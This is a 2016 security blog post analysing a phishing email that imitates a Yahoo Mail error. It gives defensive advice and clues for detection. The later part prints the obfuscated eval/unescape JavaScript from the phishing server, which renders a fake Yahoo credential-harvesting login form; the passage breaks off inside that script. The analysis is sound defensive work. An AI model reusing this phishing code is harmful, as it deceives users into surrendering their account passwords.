Tuesday, May 3, 2016

A devilishly simple phish

A diabolically simple phish, the message claims an error prevented from the message from loading, and you must click the link to see the real message.

I've had this post half-written for a couple of months, and in the interim received two more phishing emails following the same pattern. Over the weekend, a peer in the security industry mentioned he had received a phishing scam that followed this pattern but in a more carefully-crafted package tailored to look like an important message from the president of his actual homeowners' association. @GRC_Ninja has a great write-up of that particular event, with some sage advice from an employer's perspective. What follows is my advice from a consumer perspective, and then a dive into the weeds.

Some phishing approaches are carefully crafted, highly targeted, and nigh impossible to recognize as evil. Some phishing approaches are ridiculously lame and downright silly. And then there is this, from the email account of someone I do know and correspond with. Devilishly simple, and yet entirely believable, who wouldn't click on the link to see what the actual message is?

The email appears to be something that Yahoo! Mail could not display in the normal reader window, and which you must open into its own window in order to read. The "error message" at the bottom lends credibility to the scam. Those with digital rights management on their business email might even be used to messages that cannot render in the standard email reader.

Despite appearances though, this is a fake, a fake for which the three best defenses are 

  1. A password manager such as LastPass or 1Password that recognizes website domains and will not enter your password into a fake login screen; 
  2. Two-factor authentication such that if a scammer does get your password, they still cannot log in without also having your device; and
  3. A DNS resolver such as OpenDNS, that recognizes scam domains and prevents your browser from going there.



Phishing Scam Clues


Many phishing messages will either come from a stranger, or from a fake email account with a name that matches someone you know. In this case however, the message was in fact sent from the real email account of someone I know. As diabolically clever as this scam is though, there are still a few clues that it is not legitimate. The first clue is found by hovering over the link:

There are a few clues that the message is not legitimate.

Neither the tooltip (the link description that pops up near your mouse cursor) nor the URL displayed in the status bar at the bottom of the screen, look anything like yahoo.com. Of course, a clever attacker can manipulate the popup description to look legitimate, so just because something looks real is no guarantee that it is real. In this case though, they made no attempt to disguise the link.

A second, slightly more subtle clue, is the time in the error message. ART is Argentina Time, but both I and the person whose email account this message came from are in Texas. While it is certainly possible the sender was in fact travelling to Argentina, I would expect any real error related to opening the message from my mailbox, to be in my local timezone.

A third and less obvious clue is the error message itself: a quick search for Yahoo error code 1265 does not turn up anything real. In other words, there is no such thing as a Yahoo error code 1265.

So at a glance, I was fairly certain this was a phishing attempt, though it's clever enough that I might easily have clicked the link without thinking. That's precisely what a phishing scam counts on: the goal is for the victim to act before thinking, to as quickly as possible move past the point of suspicion and fall into the attacker's trap. Once in the attacker's trap, there are rarely any further clues to arouse suspicion.



Diving Deeper


At this point I did what any self-respecting hacker would do.

I clicked the link.

Unless you know what you are doing, please DON'T click the link! I opened the link from a virtual machine, a "sandbox" of sorts that is separate from my everyday-use computers, so that anything malicious would be contained to that sandbox and not infect my real life.

The link in the email message goes to:


After a few seconds, what looks like an older Yahoo login screen appears. It does not match the current login screen used by Yahoo, but it looks very much like one previously used by the company. If I were not paying attention, I might very easily be fooled.

Clicking the link loads a fake, but real-looking Yahoo! Mail login screen.

Interestingly, the screen is pre-populated with my email address, even though at first glance my address is not anywhere in the querystring. The thought crossed my mind that some of the query parameters might be base64-encoded plaintext, but that does not appear to be the case.


Ahh, but a portion of the domain turns out to be the first 19 digits of an MD5 hash - specifically, the hash for my email address. Since a hash is a one-way function, there is no way to "unhash" it and get back the email address, so I am presuming the scammer's tool stored a list of email addresses and hashes, and either uses this as a lookup value or as a validation check. Upon visiting the website, the server uses this value to lookup the victim and serve the appropriate page.


The actual MD5 for the recipient's email address is 1f43f954e11b6feb9cbc89a371714db6. The portion of this hash that appears in the domain is obviously not a coincidence.

The last parameter also looks like an MD5 hash - it's a 32-character hexadecimal string made up of the numbers [0-9] and the letters [a-f]. In this case though, I have not yet discovered what is being hashed.


Here is where things get a bit more interesting: I cannot reload the fake Yahoo login screen. Every subsequent attempt to click the link either brings me to an advertisement for some "brain-boosting drug," or to a (fake) "Windows System Alert" warning that "YOUR MICROSOFT COMPUTER HAS BEEN BLOCKED."

After the first click, opening the link again loads a generic advertisement.

It turns out the malicious link in the phishing email was booby-trapped. The evil payload (the phishing page to steal Yahoo Mail credentials) displays only on the first click. 

Server-side click tracking is fairly sophisticated for a phishing scam, but that is apparently what is going on here. I tried re-running my test from another virtual machine, and even from another IP address, just to be certain there was nothing cached local. The server is keeping track of the link to ensure it is not reused, presumably as an anti-forensics technique to counteract forensic analysis.

It's a good thing I logged the first click.

The server for msgccb[.]com replied with an HTTP 302 message - "I've moved, and here's my forwarding address." The forward address was:


Notice that the querystring - all the parameters following the "?" - match the querystring from the original link. Only the domain and webpage have changed.

The response to this request is the following obfuscated JavaScript:

<script>eval(unescape("%75%6E%65%73%63%61%70%65%3D%66%75%6E%63%74%69%6F%6E%20%28%61%37%65%37%37%35%37%62%31%65%31%32%61%62%63%62%37%33%36%61%62%39%61%37%35%34%66%66%62%36%31%37%61%2C%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%2C%61%63%61%66%31%61%33%64%66%62%35%30%35%66%66%65%64%30%64%30%32%34%31%33%30%66%35%38%63%35%63%66%61%29%7B%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%37%65%37%37%35%37%62%31%65%31%32%61%62%63%62%37%33%36%61%62%39%61%37%35%34%66%66%62%36%31%37%61%3B%66%6F%72%28%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%3D%30%3B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%3C%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%2E%6C%65%6E%67%74%68%3B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%2B%2B%29%7B%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%5B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%5D%2C%22%67%22%29%2C%61%63%61%66%31%61%33%64%66%62%35%30%35%66%66%65%64%30%64%30%32%34%31%33%30%66%35%38%63%35%63%66%61%5B%61%34%36%39%32%32%61%30%38%38%30%61%38%66%31%31%66%38%66%36%39%63%62%62%35%32%62%31%33%39%36%62%65%5D%29%3B%7D%20%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%22%25%32%36%22%2C%20%22%67%22%29%2C%20%22%26%22%29%3B%20%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%22%25%33%42%22%2C%20%22%67%22%29%2C%20%22%3B%22%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%2E%72%65%70%6C%61%63%65%28%27%3C%21%2D%2D%3F%2D%2D%3E%3C%3F%27%2C%27%3C%21%2D%2D%3F%2D%2D%3E%27%29%29%3B%20%61%37%65%37%37%35%37%62%31%65%31%32%61%62%63%62%37%33%36%61%62%39%61%37%35%34%66%66%62%36%31%37%61%3D%22%22%3B%61%63%30%65%31%39%30%64%38%32%36%37%65%33%36%37%30%38%66%39%35%35%64%37%61%62%30%34%38%39%39%30%64%3D%22%22%3B%61%63%61%66%31%61%33%64%66%62%35%30%35%66%66%65%64%30%64%30%32%34%31%33%30%66%35%38%63%35%63%66%61%3D%22%22%3B%61%65%30%63%36%34%31%31%39%35%62%32%37%34%32%35%62%62%30%35%36%61%63%35%36%66%38%39%35%33%64%32%34%3D%22%22%3B%7D")); eval(unescape("&51;&49;&63;&47;&17;&44;&38;&18;&11; &35;&16;&20;&34;&31;&51;&35;&16;&20;&34; &34;&50;&1;&57;&59;\"&13;&1;&46;&2;&23;\" &42;&34;&50;&37;&37;&59;\"&#121;&#117;&#105;&#51;&#45;&#106;&#115;&#45;&#101;&#110;&#97;&#98;&#108;&#101;&#100;\"&31;&51;&35;&13;&50;&65;&31;&51;&20;&13;&16;&50; &35;&16;&16;&32;&46;&13;&0;&58;&41;&6;&59;\"&17;&60;&1;&16;&13;&1;&16;&46;&44;&25;&32;&13;\" &42;&60;&1;&16;&13;&1;&16;&59;\"&16;&13;&3;&16;\/&35;&16;&20;&34;; &42;&35;&50;&40;&37;&13;&16;&59;&2;&44;&5;&46;8\"&31;&51;&16;&41;&16;&34;&13;&31;&38;&50;&35;&60;&60; &46; &34;&60;&57;&41;&1;&51;\/&16;&41;&16;&34;&13;&31;&51;&20;&13;&16;&50; &1;&50;&20;&13;&59;\"&#118;&#105;&#101;&#119;&#112;&#111;&#114;&#116;\" &42;&60;&1;&16;&13;&1;&16;&59;\"&41;&1;&41;&16;&41;&50;&34;&46;&37;&42;&50;&34;&13;&59;1, &20;&50;&3;&41;&20;&58;&20;&46;&37;&42;&50;&34;&13;&59;1, &20;&41;&1;&41;&20;&58;&20;&46;&37;&42;&50;&34;&13;&59;1, &58;&37;&13;&40;&46;&37;&42;&50;&34;&50;&33;&34;&13;&59;&1;&60;\"&31;&51;&34;&41;&1;&26; &40;&13;&34;&59;\"&37;&16;&25;&34;&13;&37;&35;&13;&13;&16;\" &16;&25;&32;&13;&59;\"&#116;&#101;&#120;&#116;&#47;&#99;&#115;&#115;\" &35;&40;&13;&8;&59;\"&#47;&#121;&#104;&#109;&#118;&27;&#102;&#105;&#108;&#101;&#115;&#47;&#99;&#111;&#109;&#98;&#111;&#46;&#99;&#115;&#115;\"&31;&51;\/&35;&13;&50;&65;&31;        &51;&33;&60;&65;&25; &60;&1;&34;&60;&50;&65;&59;\"&8;1.&32;.&8;&60;&42;&58;&37;&48;&15;;\" &42;&34;&50;&37;&37;&59;\"&#105;&#111;&#115;&#45;&#100;&#121;&#110;&#97;&#109;&#105;&#99;&#45;&#102;&#111;&#110;&#116;\"&31;&51;&65;&41;&6; &41;&65;&59;\"&#109;&#98;&#114;&#45;&#109;&#111;&#98;&#105;&#108;&#101;&#45;&#108;&#111;&#103;&#105;&#110;\" &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#108;&#111;&#103;&#105;&#110; &#109;&#98;&#114;&#45;&#109;&#98; \"&31;&51;&37;&42;&40;&41;&32;&16;&31;&6;&50;&40; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57; &59; &61;&33;&50;&37;&13;&23;&32;&50;&42;&13;&54;&63; : \"150002880\",&38;&9;&28;&18;&40;&60;&10;&13;&42;&16;&54;&63; : 10001756605956,&63;&60;&42;&58;&20;&13;&1;&16;&24;&50;&20;&13; : \"&14;&60;&33;&41;&34;&13; &30;&60;&57;&41;&1;\",&63;&60;&42;&58;&20;&13;&1;&16;&55;&40;&60;&58;&32;: \"&14;&60;&33;&41;&34;&13; &30;&60;&57;&41;&1;\",&33;&60;&58;&1;&42;&13;&40;&27;&34;&60;&57;&41;&1;: \"&35;&16;&16;&32;&37;:\/\/&34;&60;&57;&41;&1;.&25;&50;&35;&60;&60;.&42;&60;&20;\/&42;&60;&1;&8;&41;&57;\/&34;&60;&57;&41;&1;?.&32;&50;&40;&16;&1;&13;&40;&59;&25;&42;&60;&40;&32;&.&37;&40;&42;&59;&25;&20;&&20;&35;&60;&59;1&.&65;&60;&1;&13;&59;&35;&16;&16;&32;&37;%3&28;%2&5;%2&5;&20;&50;&41;&34;.&25;&50;&35;&60;&60;.&42;&60;&20;\"&62;;&51;\/&37;&42;&40;&41;&32;&16;&31;&51;&20;&50;&41;&1; &40;&60;&34;&13;&59;\"&20;&50;&41;&1;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#50;&#53;\" &37;&16;&25;&34;&13;&59;\"&46;&22;&13;&33;&26;&41;&16;&46;&58;&37;&13;&40;&46;&37;&13;&34;&13;&42;&16;: &1;&60;&1;&13;; &16;&60;&58;&42;&35;&46;&50;&42;&16;&41;&60;&1;: &32;&50;&1;&46;&25;; &46;&22;&13;&33;&26;&41;&16;&46;&58;&37;&13;&40;&46;&65;&40;&50;&57;: &1;&60;&1;&13;; &46;&22;&13;&33;&26;&41;&16;&46;&16;&50;&32;&46;&35;&41;&57;&35;&34;&41;&57;&35;&16;&46;&42;&60;&34;&60;&40;: &40;&57;&33;&50;&48;0, 0, 0, 0&15;;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#109;&#97;&#105;&#110;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#49;&#48;&#54;\"&31;&51;&35;&13;&50;&65;&13;&40; &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#49;&#48;&#53;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#109;&#98;&#45;&#104;&#100;&#114;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#104;&#101;&#97;&#100;&#101;&#114;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;\"&31;&51;&41;&20;&57; &37;&40;&42;&59;\"&#47;&#121;&#104;&#109;&#118;&27;&#102;&#105;&#108;&#101;&#115;&#47;&#121;&#97;&#104;&#111;&#111;&27;&#101;&#110;&#45;&#85;&#83;&27;&#102;&27;&#112;&27;&#98;&#101;&#115;&#116;&#102;&#105;&#116;&27;&#50;&#120;&#46;&#112;&#110;&#103;\" &50;&34;&16;&59;\"&#89;&#97;&#104;&#111;&#111;\"&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&35;&13;&50;&65;&13;&40;&31;&51;&32; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#109;&#98;&#45;&#108;&#111;&#103;&#105;&#110;&#45;&#116;&#105;&#116;&#108;&#101; &#109;&#98;&#114;&#45;&#116;&#101;&#120;&#116;&#45;&#49;&#51;\"&31;&#83;&#105;&#103;&#110; &#105;&#110; &#116;&#111; &#121;&#111;&#117;&#114; &#97;&#99;&#99;&#111;&#117;&#110;&#116;&51;\/&32;&31;&51;&8;&60;&40;&20; &20;&13;&16;&35;&60;&65;&59;\"&#112;&#111;&#115;&#116;\" &1;&50;&20;&13;&59;\"&#102;&#49;\" &41;&65;&59;\"\" &50;&42;&16;&41;&60;&1;&59;\"\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#102;&#111;&#114;&#109; &#112;&#117;&#114;&#101;&#45;&#102;&#111;&#114;&#109;&#45;&#115;&#116;&#97;&#99;&#107;&#101;&#100; &#109;&#98;&#114;&#45;&#109;&#98;&#45;&#108;&#111;&#103;&#105;&#110;&#45;&#102;&#114;&#109;\" &1;&60;&6;&50;&34;&41;&65;&50;&16;&13;&59;\"\"&31;    &51;&8;&41;&13;&34;&65;&37;&13;&16; &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#103;&#114;&#111;&#117;&#112; &#109;&#98;&#45;&#102;&#115;&#101;&#116;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#49;&#48;&#56;\"&31;        &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;&#45;&#102;&#105;&#101;&#108;&#100; &#112;&#117;&#114;&#101;&#45;&#103; &#102;&#111;&#99;&#117;&#115;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#49;&#48;&#55;\"&31;                        &51;&65;&41;&6; &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;&#45;&#102;&#105;&#101;&#108;&#100;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117; &#115;&#101;&#108;&#101;&#99;&#116;&#101;&#100;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101; &#110;&#97;&#114;&#114;&#111;&#119; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;                &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#115;&#101;&#108;&#101;&#99;&#116;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\" &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;\"&31;                    &51;&37;&32;&50;&1; &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#110;&#97;&#109;&#101;\" &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;&#85;&#110;&#105;&#116;&#101;&#100; &#83;&#116;&#97;&#116;&#101;&#115; &#40;&#43;&#49;&#41;&51;\/&37;&32;&50;&1;&31;                     &51;&37;&32;&50;&1;&31;&#43;&#49;&51;\/&37;&32;&50;&1;&31;                    &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;&#45;&#97;&#114;&#114;&#111;&#119;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;\"&31;&51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;&#45;&#97;&#114;&#114;&#111;&#119;\"&31;&51;\/&37;&32;&50;&1;&31;&51;\/&37;&32;&50;&1;&31;                &51;\/&65;&41;&6;&31;                &51;&34;&50;&33;&13;&34; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\" &8;&60;&40;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#115;&#101;&#108;&#101;&#99;&#116;&#45;&#99;&#111;&#117;&#110;&#116;&#114;&#121;&#45;&#99;&#111;&#100;&#101;\"&31;&17;&60;&58;&1;&16;&40;&25; &20;&13;&1;&58;&51;\/&34;&50;&33;&13;&34;&31;            &51;\/&65;&41;&6;&31;                        &51;&41;&1;&32;&58;&16; &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;\" &16;&25;&32;&13;&59;\"&#101;&#109;&#97;&#105;&#108;\" &1;&50;&20;&13;&59;\"&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#105;&#110;&#112;&#117;&#116;&#45;&#49; \" &50;&40;&41;&50;&46;&40;&13;&0;&58;&41;&40;&13;&65;&59;\"&16;&40;&58;&13;\" &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&59;\"&11;&20;&50;&41;&34; &50;&65;&65;&40;&13;&37;&37;\" &50;&58;&16;&60;&42;&60;&40;&40;&13;&42;&16;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&60;&20;&32;&34;&13;&16;&13;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&50;&32;&41;&16;&50;&34;&41;&19;&13;&59;\"&60;&8;&8;\" &16;&41;&16;&34;&13;&59;\"&#69;&#109;&#97;&#105;&#108; &#97;&#100;&#100;&#114;&#101;&#115;&#115;\" &6;&50;&34;&58;&13;&59;\"&#100;&#110;&#108;&#111;&#110;&#103;&#101;&#110;&#64;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"1\"&31;            &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110;&#45;&#117;&#110;&#97;&#109;&#101; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;                &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"&#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110;&#45;&#98;&#117;&#116;&#116;&#111;&#110;\"&31;&51;\/&37;&32;&50;&1;&31;            &51;\/&65;&41;&6;&31;        &51;\/&65;&41;&6;&31;        &51;&65;&41;&6; &41;&65;&59;\"&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#102;&#105;&#101;&#108;&#100;\" &42;&34;&50;&37;&37;&59;\"&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#102;&#105;&#101;&#108;&#100; &#104;&#97;&#115;&#45;&#109;&#101;&#115;&#115;&#97;&#103;&#101; \"&31;            &51;&41;&1;&32;&58;&16; &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#112;&#97;&#115;&#115;&#119;&#100;\" &16;&25;&32;&13;&59;\"&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#105;&#110;&#112;&#117;&#116;&#45;&#49; \" &50;&40;&41;&50;&46;&40;&13;&0;&58;&41;&40;&13;&65;&59;\"&16;&40;&58;&13;\" &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&59;\"&18;&50;&37;&37;&22;&60;&40;&65;\" &50;&58;&16;&60;&42;&60;&40;&40;&13;&42;&16;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&60;&20;&32;&34;&13;&16;&13;&59;\"&60;&8;&8;\" &50;&58;&16;&60;&42;&50;&32;&41;&16;&50;&34;&41;&19;&13;&59;\"&60;&8;&8;\" &1;&50;&20;&13;&59;\"&#112;\" &16;&41;&16;&34;&13;&59;\"&#80;&#97;&#115;&#115;&#119;&#111;&#114;&#100;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"2\"&31;            &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110;&#45;&#112;&#97;&#115;&#115;&#119;&#100; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;                &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"&#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110; &#99;&#108;&#111;&#115;&#101;&#45;&#105;&#99;&#111;&#110;&#45;&#98;&#117;&#116;&#116;&#111;&#110;\"&31;&51;\/&37;&32;&50;&1;&31;            &51;\/&65;&41;&6;&31;            &51;&65;&41;&6; &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#109;&#101;&#115;&#115;&#97;&#103;&#101;\" &42;&34;&50;&37;&37;&59;\"&#112;&#97;&#115;&#115;&#119;&#100;&#45;&#109;&#101;&#115;&#115;&#97;&#103;&#101; &#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;                &#84;&#97;&#112; &#99;&#111;&#110;&#116;&#105;&#110;&#117;&#101; &#116;&#111; &#114;&#101;&#99;&#101;&#105;&#118;&#101; &#97;&#110; &#111;&#110;&#45;&#100;&#101;&#109;&#97;&#110;&#100; &#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&#46;            &51;\/&65;&41;&6;&31;        &51;\/&65;&41;&6;&31;    &51;\/&8;&41;&13;&34;&65;&37;&13;&16;&31;    &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#101;&#114;&#114;&#111;&#114; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\" &41;&65;&59;\"&#109;&#98;&#114;&#45;&#101;&#114;&#114;&#111;&#114;\" &40;&60;&34;&13;&59;\"&50;&34;&13;&40;&16;\" &42;&60;&65;&13;&59;\"0\"&31;&51;\/&37;&32;&50;&1;&31;    &51;&37;&32;&50;&1; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#101;&#114;&#114;&#111;&#114; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\" &41;&65;&59;\"&#110;&#119;&#45;&#101;&#114;&#114;&#111;&#114;\" &40;&60;&34;&13;&59;\"&50;&34;&13;&40;&16;\"&31;&#78;&#101;&#116;&#119;&#111;&#114;&#107; &#99;&#111;&#110;&#110;&#101;&#99;&#116;&#105;&#111;&#110; &#116;&#105;&#109;&#101;&#100; &#111;&#117;&#116;&#46; &#80;&#108;&#101;&#97;&#115;&#101; &#116;&#114;&#121; &#97;&#103;&#97;&#105;&#110;&#46;&51;\/&37;&32;&50;&1;&31;        &51;&33;&58;&16;&16;&60;&1; &16;&25;&32;&13;&59;\"&#115;&#117;&#98;&#109;&#105;&#116;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110; &#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#112;&#117;&#114;&#101;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#112;&#114;&#105;&#109;&#97;&#114;&#121; &#109;&#98;&#114;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#112;&#117;&#114;&#112;&#108;&#101; \" &1;&50;&20;&13;&59;\"&#115;&#105;&#103;&#110;&#105;&#110;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&37;&34;&26;&59;\"&37;&41;&57;&1;&41;&1;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"3\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#115;&#105;&#103;&#110;&#105;&#110;\"&31;&#83;&#105;&#103;&#110; &#73;&#110;&51;\/&33;&58;&16;&16;&60;&1;&31;        &51;&65;&41;&6; &41;&65;&59;\"&#121;&#97;&#104;&#111;&#111;&#45;&#106;&#97;&#112;&#97;&#110;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;\" &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;        &51;&50; &35;&40;&13;&8;&59;\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#121;&#97;&#104;&#111;&#111;&#45;&#104;&#101;&#108;&#112;&#46;&#106;&#112;&#47;&#97;&#112;&#112;&#47;&#97;&#110;&#115;&#119;&#101;&#114;&#115;&#47;&#100;&#101;&#116;&#97;&#105;&#108;&#47;&#112;&#47;&#53;&#54;&#53;&#47;&#97;&27;&#105;&#100;&#47;&#52;&#55;&#55;&#49;&#51;&#63;&#115;&#111;&#99;&27;&#115;&#114;&#99;&#61;&#109;&#97;&#105;&#108;&#38;&#115;&#111;&#99;&27;&#116;&#114;&#107;&#61;&#109;&#97;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#112;&#117;&#114;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110; \" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"4\"&31;            &#86;&#105;&#115;&#105;&#116; &#89;&#97;&#104;&#111;&#111; &#72;&#101;&#108;&#112;        &51;\/&50;&31;        &51;&65;&41;&6; 